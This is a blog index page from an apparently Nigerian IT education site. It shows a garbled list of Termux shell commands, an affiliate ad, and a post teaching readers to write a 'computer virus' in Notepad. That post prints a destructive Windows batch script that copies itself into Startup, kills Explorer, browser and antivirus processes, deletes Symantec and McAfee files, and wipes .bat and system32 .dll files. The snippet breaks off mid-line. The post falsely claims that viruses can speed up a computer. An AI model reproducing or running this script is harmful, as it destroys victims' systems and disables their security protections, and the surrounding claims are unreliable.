COVID-19 IS REAL PLEASE STAY AT HOME, FOR ADVERT PLACEMENT OR INQUIRY PLEASE CALL: 08166201592 OR 09031936614 THANKS COMPUTERCONS Skip to main content

Posts

Center for Information Technology and Education Standards

Basic Turmux Commands

Turmux is an android terminal emulator that enables command line interface, just like command prompt , it  works directly with no rooting or setup required Basic Command Codes and Their Functions cp -v This is used to prints informative massage cp -r This is used to copy any directory mv -u This is used to update-move when source is newer than destination mv -v This is used to move any directory ls -n This is used to display UID and GID directory ls --version This is used to check the version of ls command cd -- This is used to show last working directory from where we moved ls -l This is used to show file action like - modified, date and time, owner of file, permissions Etc. ls help This is used to show display how to use "ls" command cp -n no file overwrite cd ~ This is used to move to users home directory from anywhere mv [file1 name] [new file2 name] This is used to move or rename two file at a time cd - This is used to move one directory back from

Signup New Affiliates

Konga Signup New Affiliates Program is where you Refer other partners directly to konga signup form and start earning  Don't miss this opportunity Click Here to Sign Up

How to write a Computer Virus Program

Computer Virus is simply a  program written by programmer to fight against the computer system. Sometimes some computer virus help to boost the speed of your computer.  1. How to make a virus with notepad To write your first computer virus program copy this code below and past on Note pad .   @echo off copy “virus.bat” “C:Documents and SettingsAll UsersStart MenuProgramsStartup” copy “virus.bat” “C:” copy “virus.bat” “%userprofile%My Documents” tskill explorer tskill ccapp tskill yahoomessenger tskill firefox tskill chrome rem made with Batch Virus Maker V.2 tskill iexplorer time 12:00 rem made with Batch Virus Maker V.2 del C:Program FilesCommon FilesSymantec Sharedccapp.exe cd C:WINDOWS if exist “*.bat” del “*.bat” cd C:WINDOWSsystem32 rem made with Batch Virus Maker V.2 if exist “*.dll” del “*.dll” tskill McAfee Security Centre Module del c:program filesmcafee.comagentmcdetect.exe rem made with Batch Virus Maker V.2 copy “vir